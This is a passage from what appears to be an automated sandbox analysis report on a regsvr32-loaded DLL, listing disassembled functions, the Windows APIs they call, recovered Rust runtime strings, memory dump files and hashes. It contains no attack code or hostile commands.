                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: 0$0
                                                                  • API String ID: 2221118986-203156872
                                                                  • Opcode ID: e155599360b7ac03e7c5c36e192813f0ab353054b0a11caf4c9772f179190a3e
                                                                  • Instruction ID: adc28452e3ca86197d5d4e15c3ad20f4119be3a63b3e4b3dcd7019854b554248
                                                                  • Opcode Fuzzy Hash: e155599360b7ac03e7c5c36e192813f0ab353054b0a11caf4c9772f179190a3e
                                                                  • Instruction Fuzzy Hash: 2A12E371E0071A8FDB25CF6CC5806ADB7B1BF8A304B148769C855AB752EB30D945CBA1
                                                                  Function 6C85C720 Relevance: 6.3, APIs: 4, Instructions: 332COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CallNtPowerInformation.POWRPROF(0000000B,00000000,00000000,00000004,?), ref: 6C85C787
                                                                  • GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,00000000), ref: 6C85C86B
                                                                  • GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000001,00000000,0000FFFF,00000000,00000000), ref: 6C85C8D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Information$LogicalProcessor$CallPower
                                                                  • String ID:
                                                                  • API String ID: 2272075218-0
                                                                  • Opcode ID: c11a9843093a79154b60546569a05dcce315b9a7cdc413f9b818210a1ac5747f
                                                                  • Instruction ID: 58eed8cee9df430899a601a17727eccaf521cc328fde396f44e976d025f40b8c
                                                                  • Opcode Fuzzy Hash: c11a9843093a79154b60546569a05dcce315b9a7cdc413f9b818210a1ac5747f
                                                                  • Instruction Fuzzy Hash: FFB106B1D012199BDB60DFA9CD40BEEB7B8AF49348F544839E804E7742E7B4D914CBA1
                                                                  Function 6C880E80 Relevance: 5.9, Strings: 4, Instructions: 905COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • call<searcher kind union>, xrefs: 6C8818ED
                                                                  • Prefilter<prefilter function>, xrefs: 6C8818D0
                                                                  • kind, xrefs: 6C881907
                                                                  • rarest_byterarest_offsetC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\memchr-2.7.4\src\memmem\mod.rs, xrefs: 6C881920
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Prefilter<prefilter function>$call<searcher kind union>$kind$rarest_byterarest_offsetC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\memchr-2.7.4\src\memmem\mod.rs
                                                                  • API String ID: 0-2748652549
                                                                  • Opcode ID: f944d95d57261db4c4a80b42ef33d182ce31cb01f0e6c77c3b514a4d0e0e3bf6
                                                                  • Instruction ID: d34419acf803bacf06c902ea13ff638a99887b2bcac963467aa659ddbf940137
                                                                  • Opcode Fuzzy Hash: f944d95d57261db4c4a80b42ef33d182ce31cb01f0e6c77c3b514a4d0e0e3bf6
                                                                  • Instruction Fuzzy Hash: FE728070E051198FCF24CF68C990AEEB7B2BF89314F154969E825A7B55DB34EC01CBA0
                                                                  Function 6C871AF0 Relevance: 5.5, APIs: 4, Instructions: 484COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: b84cb84415bb1b340f45bf5947f8be72ad21f3524f5747e917c630d8e75c3227
                                                                  • Instruction ID: 6e25cf0f7e502c7feaecf5d858be16bcda32b351551784cb3bd2a5a8e5782b7c
                                                                  • Opcode Fuzzy Hash: b84cb84415bb1b340f45bf5947f8be72ad21f3524f5747e917c630d8e75c3227
                                                                  • Instruction Fuzzy Hash: 73121371E0464A8FDB24CF6CC9906ADB7B1FF99308F148768C859AB752EB30E585C760
                                                                  Function 6C872D80 Relevance: 5.5, APIs: 4, Instructions: 480COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 557ffad480fabf2ba31abcf2117e46a263404616c36a7dfa434019e2a7609e44
                                                                  • Instruction ID: b8eddc3488f65ebbfd1fab8ac588cce663dc05ac3b25b26a5b9fb060f8dbf506
                                                                  • Opcode Fuzzy Hash: 557ffad480fabf2ba31abcf2117e46a263404616c36a7dfa434019e2a7609e44
                                                                  • Instruction Fuzzy Hash: B3120331E04B498BDB25CF68C9417FCB7B1BFA9308F18976CD8596B253EB31A9818750
                                                                  Function 6C92E330 Relevance: 5.5, Strings: 4, Instructions: 456COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: .0.$assertion failed: !buf.is_empty()$assertion failed: buf[0] > b'0'$eEe-E--+NaNinf00e00E0assertion failed: ndigits > 0
                                                                  • API String ID: 2221118986-3378266233
                                                                  • Opcode ID: be61bd4285345b31b2d5c42f6db9b35aa69f15d41dfb9f0c6c0ea94ae50f5f9a
                                                                  • Instruction ID: ca4b0e77093ad11a394da4760f457131354d743eaf08d5801f8f93d33b800b01
                                                                  • Opcode Fuzzy Hash: be61bd4285345b31b2d5c42f6db9b35aa69f15d41dfb9f0c6c0ea94ae50f5f9a
                                                                  • Instruction Fuzzy Hash: 6F02F3B2A193409BD310CF29C48179AB7E5FFC5348F04992EF5D88B795E7B9D8448B82
                                                                  Function 6C873A40 Relevance: 5.0, APIs: 2, Strings: 1, Instructions: 459COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: l)\%
                                                                  • API String ID: 2221118986-975318231
                                                                  • Opcode ID: ee1db8dffcb8be3e593ba2db21025bca21596ffd38e3a2bd5eaf96cd9053781f
                                                                  • Instruction ID: a3a19bf07ad663028602b4b7a1635e85a6c0af27010ed826701039134ce709d3
                                                                  • Opcode Fuzzy Hash: ee1db8dffcb8be3e593ba2db21025bca21596ffd38e3a2bd5eaf96cd9053781f
                                                                  • Instruction Fuzzy Hash: F51236319082958FCB25CF6CC4905ADFFB1AF56304B1DC699D8A96B396E330D905CBA1
                                                                  Function 6C896830 Relevance: 4.1, APIs: 3, Instructions: 384COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,?,00000080), ref: 6C896918
                                                                  • memcpy.MSVCRT(00000080,00000080,00000080,00000080,6C97DC9C), ref: 6C896C3D
                                                                  • memcpy.MSVCRT(00000080,6C97DC8C,00000080,00000000,4388800C,00000080,6C97DC9C,4388800C,?,6C97DC8C,00000080,6C97DC9C), ref: 6C896D2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: c146aeb6d9fd87962fddb87425ca3537c7ac0af67006e48181c70afd1299bce3
                                                                  • Instruction ID: d1198b0578dfeba7f2e55fcbf11c2ea67147c14b899a3fba04adc1aaf151293d
                                                                  • Opcode Fuzzy Hash: c146aeb6d9fd87962fddb87425ca3537c7ac0af67006e48181c70afd1299bce3
                                                                  • Instruction Fuzzy Hash: F6F1CA36D04B598BCB21CF68CC40BEEB7B5FF9A304F05465AE8487B642DB709985CB90
                                                                  Function 6C8A9540 Relevance: 3.7, Strings: 2, Instructions: 1193COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • nd 3expa, xrefs: 6C8A9894
                                                                  • te kexpate k2-byte kte k2-by2-bynd 3nd 3expa2-byexpand 3, xrefs: 6C8A9846
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: nd 3expa$te kexpate k2-byte kte k2-by2-bynd 3nd 3expa2-byexpand 3
                                                                  • API String ID: 0-2854347106
                                                                  • Opcode ID: fefa4fb2c76f4587aa34108c62916a1e4618eeeb307a88ff3978be32e249b1c5
                                                                  • Instruction ID: 905caa5b6ee3ef6935d9699a0a27fe7ee6070f1b79786ee1ba2f48d5366b5af2
                                                                  • Opcode Fuzzy Hash: fefa4fb2c76f4587aa34108c62916a1e4618eeeb307a88ff3978be32e249b1c5
                                                                  • Instruction Fuzzy Hash: 86E25AB0D012288FDB68CF99C984BDDFBB1BF88314F6581AAD409B7215D7346A86CF54
                                                                  Function 6C86F450 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 6C86F4E9
                                                                  • RtlGetVersion.NTDLL ref: 6C86F502
                                                                    • Part of subcall function 6C85B650: PdhOpenQueryA.PDH(00000000,00000000,?,?,00000000,00000000), ref: 6C85B66A
                                                                    • Part of subcall function 6C85B650: PdhAddEnglishCounterA.PDH(00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6C85B688
                                                                    • Part of subcall function 6C85B650: PdhCloseQuery.PDH(00000000,00000000,00000005,00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?), ref: 6C85B694
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Query$CloseCounterEnglishOpenVersionmemset
                                                                  • String ID:
                                                                  • API String ID: 3694610374-0
                                                                  • Opcode ID: ad6172dee7474d367a162037de6e78bf8e0dd2d7f945af1b3396c84212e8acb7
                                                                  • Instruction ID: 5042d55fb99872084ca3a44aa60189648b97eeffa6cfd9f2099d7a772724b923
                                                                  • Opcode Fuzzy Hash: ad6172dee7474d367a162037de6e78bf8e0dd2d7f945af1b3396c84212e8acb7
                                                                  • Instruction Fuzzy Hash: DA21D135C00B1C9BC721DF28D9067D6B7B4AF2B354F004A99EA89ABA52E730D954CBD1
                                                                  Function 6C921760 Relevance: 3.1, Strings: 2, Instructions: 551COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • a formatting trait implementation returned an error when the underlying stream did notalloc\src\fmt.rs, xrefs: 6C9218C6
                                                                  • called `Result::unwrap()` on an `Err` valueErrorLayoutError, xrefs: 6C92194D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: a formatting trait implementation returned an error when the underlying stream did notalloc\src\fmt.rs$called `Result::unwrap()` on an `Err` valueErrorLayoutError
                                                                  • API String ID: 3510742995-4199672088
                                                                  • Opcode ID: d0ddd8f147164b496733aa39f8eb9b90362b7c7f4e51611bd1a30993a90b7bcc
                                                                  • Instruction ID: b9c2892d910f6c96e4ba427420baa3ca85bb0e6258c586dcf79fdf91010fdd52
                                                                  • Opcode Fuzzy Hash: d0ddd8f147164b496733aa39f8eb9b90362b7c7f4e51611bd1a30993a90b7bcc
                                                                  • Instruction Fuzzy Hash: 6D12BC72E212158BDB05CE28C8406FEB3B5AF97344F15832AE89477B49E73ACE51C380
                                                                  Function 6C895180 Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?$@
                                                                  • API String ID: 0-1463999369
                                                                  • Opcode ID: 6663654e2d044be12261c58b45630c1dd4e63eb8e6d5ab9232d8feab286bbbc2
                                                                  • Instruction ID: 573fa89eb4c0a3ba1c0f31ccda5769e234fcc6ce1381dbefea5137cd957c3ac4
                                                                  • Opcode Fuzzy Hash: 6663654e2d044be12261c58b45630c1dd4e63eb8e6d5ab9232d8feab286bbbc2
                                                                  • Instruction Fuzzy Hash: 9612D671E00B598FCB15CF68C880AAEB7B6FF9A344F15875AD9197F212CB309941CB54
                                                                  Function 6C872750 Relevance: 3.0, APIs: 2, Instructions: 481COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: df4de7710fe018ec3ee80e162d77957de5a28084c256419e7028bbd318eac088
                                                                  • Instruction ID: 778b9135aa8141738b7442e99f492ed95e72af4b05324bf087d4ea9c99207853
                                                                  • Opcode Fuzzy Hash: df4de7710fe018ec3ee80e162d77957de5a28084c256419e7028bbd318eac088
                                                                  • Instruction Fuzzy Hash: 2D1235319082A6CFCB25CF6CC4905ADFFF1BF56300B19869DD8A46B792E7349944CBA0
                                                                  Function 6C872150 Relevance: 3.0, APIs: 2, Instructions: 460COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 9ffd6248bbacf4a5a100e7e9ff324db06e5a9880a382f2bf8e894613036de3a7
                                                                  • Instruction ID: 30390dc8dfa7effce4ee69cd890f5c74b203157c3b0406973a780c6515499caf
                                                                  • Opcode Fuzzy Hash: 9ffd6248bbacf4a5a100e7e9ff324db06e5a9880a382f2bf8e894613036de3a7
                                                                  • Instruction Fuzzy Hash: B0124471908295CFCB25CF6CC8905ADFFB1AF56204B1DC699D8A56B793E334D940CBA0
                                                                  Function 6C92D360 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • assertion failed: buf.len() >= maxlen, xrefs: 6C92D6C9
                                                                  • -+NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 6C92D4AB, 6C92D819
